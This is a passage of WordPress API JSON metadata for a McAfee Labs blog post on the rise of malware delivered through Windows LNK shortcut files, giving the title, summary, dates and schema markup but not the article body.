Labs\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/image\/af947d76ffbef8521094b476cf8050c3\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2017\/07\/Social-Media-PF-Logo-Pic-300x300-2-96x96.jpg\",\"contentUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2017\/07\/Social-Media-PF-Logo-Pic-300x300-2-96x96.jpg\",\"caption\":\"McAfee Labs\"},\"description\":\"McAfee Labs is one of the leading sources for threat research, threat intelligence, and cybersecurity thought leadership. See our blog posts below for more information.\",\"sameAs\":[\"https:\/\/www.linkedin.com\/company\/mcafee\/\",\"https:\/\/www.facebook.com\/McAfee\/\",\"https:\/\/x.com\/McAfee_Labs\"],\"url\":\"https:\/\/www.mcafee.com\/blogs\/author\/mcafee-labs\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Rise of LNK (Shortcut files) Malware | McAfee Blog","description":"An LNK file is a Windows Shortcut that serves as a pointer to open a file, folder, or application. LNK files are based on the Shell Link binary file format, which holds information used to access another data object. McAfee Labs has seen a rise in malware being delivered using LNK files.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"og_locale":"en_US","og_type":"article","og_title":"Rise of LNK (Shortcut files) Malware | McAfee Blog","og_description":"An LNK file is a Windows Shortcut that serves as a pointer to open a file, folder, or application. LNK files are based on the Shell Link binary file format, which holds information used to access another data object. McAfee Labs has seen a rise in malware being delivered using LNK files.","og_url":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-of-lnk-shortcut-files-malware\/","og_site_name":"McAfee Blog","article_publisher":"https:\/\/www.facebook.com\/McAfee\/","article_author":"https:\/\/www.facebook.com\/McAfee\/","article_published_time":"2022-06-21T18:58:20+00:00","article_modified_time":"2024-02-27T03:37:52+00:00","og_image":[{"width":300,"height":200,"url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/06\/300x200_Blog_LNK-Malware.png","type":"image\/png"}],"author":"McAfee Labs","twitter_card":"summary_large_image","twitter_creator":"@McAfee_Labs","twitter_site":"@McAfee","twitter_misc":{"Written by":"McAfee Labs","Est. reading time":"7 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-of-lnk-shortcut-files-malware\/#article","isPartOf":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-of-lnk-shortcut-files-malware\/"},"author":{"name":"McAfee Labs","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/86f325fa6532a017d06d6b49a2f3b1ad"},"headline":"Rise of LNK (Shortcut files) Malware","datePublished":"2022-06-21T18:58:20+00:00","dateModified":"2024-02-27T03:37:52+00:00","mainEntityOfPage":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-of-lnk-shortcut-files-malware\/"},"wordCount":1095,"publisher":{"@id":"https:\/\/www.mcafee.com\/blogs\/#organization"},"image":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-of-lnk-shortcut-files-malware\/#primaryimage"},"thumbnailUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/06\/300x200_Blog_LNK-Malware.png","articleSection":["McAfee Labs"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-of-lnk-shortcut-files-malware\/","url":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-of-lnk-shortcut-files-malware\/","name":"Rise of LNK (Shortcut files) Malware | McAfee Blog","isPartOf":{"@id":"https:\/\/www.mcafee.com\/blogs\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-of-lnk-shortcut-files-malware\/#primaryimage"},"image":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-of-lnk-shortcut-files-malware\/#primaryimage"},"thumbnailUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/06\/300x200_Blog_LNK-Malware.png","datePublished":"2022-06-21T18:58:20+00:00","dateModified":"2024-02-27T03:37:52+00:00","description":"An LNK file is a Windows Shortcut that serves as a pointer to open a file, folder, or application. LNK files are based on the Shell Link binary file format, which holds information used to access another data object. McAfee Labs has seen a rise in malware being delivered using LNK files.","breadcrumb":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-of-lnk-shortcut-files-malware\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-of-lnk-shortcut-files-malware\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-of-lnk-shortcut-files-malware\/#primaryimage","url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/06\/300x200_Blog_LNK-Malware.png","contentUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/06\/300x200_Blog_LNK-Malware.png","width":300,"height":200},{"@type":"BreadcrumbList","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-of-lnk-shortcut-files-malware\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Blog","item":"https:\/\/www.mcafee.com\/blogs\/"},{"@type":"ListItem","position":2,"name":"Other Blogs","item":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/"},{"@type":"ListItem","position":3,"name":"McAfee Labs","item":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/"},{"@type":"ListItem","position":4,"name":"Rise of LNK (Shortcut files) Malware"}]},{"@type":"WebSite","@id":"https:\/\/www.mcafee.com\/blogs\/#website","url":"https:\/\/www.mcafee.com\/blogs\/","name":"McAfee Blog","description":"Internet Security News","publisher":{"@id":"https:\/\/www.mcafee.com\/blogs\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.mcafee.com\/blogs\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.mcafee.com\/blogs\/#organization","name":"McAfee","url":"https:\/\/www.mcafee.com\/blogs\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/","url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png","contentUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png","width":1286,"height":336,"caption":"McAfee"},"image":{"@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/McAfee\/","https:\/\/x.com\/McAfee","https:\/\/www.linkedin.com\/company\/mcafee\/","https:\/\/www.youtube.com\/McAfee"]},{"@type":"Person","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/86f325fa6532a017d06d6b49a2f3b1ad","name":"McAfee Labs","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/image\/af947d76ffbef8521094b476cf8050c3","url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2017\/07\/Social-Media-PF-Logo-Pic-300x300-2-96x96.jpg","contentUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2017\/07\/Social-Media-PF-Logo-Pic-300x300-2-96x96.jpg","caption":"McAfee Labs"},"description":"McAfee Labs is one of the leading sources for threat research, threat intelligence, and cybersecurity thought leadership. See our blog posts below for more information.","sameAs":["https:\/\/www.linkedin.com\/company\/mcafee\/","https:\/\/www.facebook.com\/McAfee\/","https:\/\/x.com\/McAfee_Labs"],"url":"https:\/\/www.mcafee.com\/blogs\/author\/mcafee-labs\/"}]}},"_links":{"self":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts\/155118","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/users\/695"}],"replies":[{"embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/comments?post=155118"}],"version-history":[{"count":3,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts\/155118\/revisions"}],"predecessor-version":[{"id":184183,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts\/155118\/revisions\/184183"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/media\/155133"}],"wp:attachment":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/media?parent=155118"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/categories?post=155118"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/tags?post=155118"},{"taxonomy":"author","embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/coauthors?post=155118"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}